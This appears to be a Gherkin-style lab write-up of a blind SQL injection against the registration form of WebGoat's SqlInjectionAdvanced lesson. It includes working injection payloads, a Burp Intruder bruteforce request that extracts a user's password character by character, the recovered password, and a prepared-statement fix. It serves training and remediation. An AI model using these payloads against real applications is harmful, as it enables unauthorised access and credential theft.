## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Location:
    http://localhost/WebGoat/start.mvc#lesson/SqlInjectionAdvanced
    .lesson/4 - username_reg (Field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Login as user using sql injection
  Recommendation:
    Do not use string concatenation of sql queries

  Background:
  Hacker's software:
    | <Software name>    |    <Version>         |
    | Windows            | 10.0.16299 (x64)     |
    | Mozilla Firefox    | 63.0                 |
    | Visual Studio Code | 1.29.1               |
    | Burp Suite CE      | 1.7.36               |
  TOE information:
    Given I'm running WebGoat standalone jar application
    And using java jre1.8.0_181 to run it
    """
    java -jar webgoat-server-8.0.0.M21.jar --server.port=80
    """
    And the url
    """
    http://localhost/WebGoat/start.mvc#lesson/SqlInjectionAdvanced
    .lesson/4
    """
    And I'm accessing the WebGoat site through my browser

  Scenario: Normal use case
  The site allows the user to register and login
    Given The access to the websit url
    Then I fill the user email and passwords
    And I click register now
    Then the website returns a message of the user created

  Scenario: Static detection
  Inspect reflected code
    Given The backend code at
    """
    webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/plugin
    /advanced/SqlInjectionChallenge.java
    """
    Then I check the piece of the code
    """
    49  String checkUserQuery = "select userid from " + USERS_TABLE_NAME +
    " where userid = '" + username_reg + "'";
    """
    And I see the query is concatenated and the username can be injected

  Scenario: Dynamic detection
  Perform blind sql injection
    Given the website registration form
    Then I try registering user tom
    And the system shows it already exists
    And i try injecting in the user name field
    """
    tom' --
    """
    And I get the user already exists
    And I try the injection
    """
    tom' and substring(password,1,1)='a'--
    """
    And I obtain the message
    """
    User tom' and substring(password,1,1)='a'-- created,
    please proceed to the login page.
    """
    And I check on the browser the response
    """
    lessonCompleted: true
    """
    Then I try different letters for the substring and with letter 'h' I get
    """
    User tom' and substring(password,1,1)='t'-- already exists please try
    to register with a different username.
    """
    And I deduce the first letter of the password is 't'
    And I check on the browser the response
    """
    lessonCompleted: false
    """

  Scenario: Exploitation
  Bruteforce and sql injection over each passworch characters
    Given the website url
    Then I use Burp Suite to intercept the request for user registration
    Then I do a bruteforce attack on the character parameter for substring 2
    """
    username_reg=tom'+and+substring(password%2C2%2C1)%3D'§{bruteforce}§'--
    &email_reg=aa%40ddd.com&password_reg=aa&confirm_password_reg=aa
    """
    And I do the same with substring 3,4... and so on
    And I check case when response is false [evidence](intruder-attack.png)
    """
    lessonCompleted: false
    """
    And I deduce the password "thisisasecretfortomonly"

  Scenario: Remediation
  Use prepared statement instead of concatenated strings
    Given the source code for checking the "username_reg"
    Then create query as a prepared statement
    """
    PreparedStatement preparedStatement = connection.prepareStatement(
    "select userid from " + USERS_TABLE_NAME + " where userid = ?");
    """
    And interpolate "username_reg" safely
    """
    preparedStatement.setString(1, username_reg);
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.9/10 (Medium) - AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.0/10 (Medium) - E:U/RL:W/RC:R
  Environmental: Unique and relevant attributes to a specific user environment
    4.1/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-08
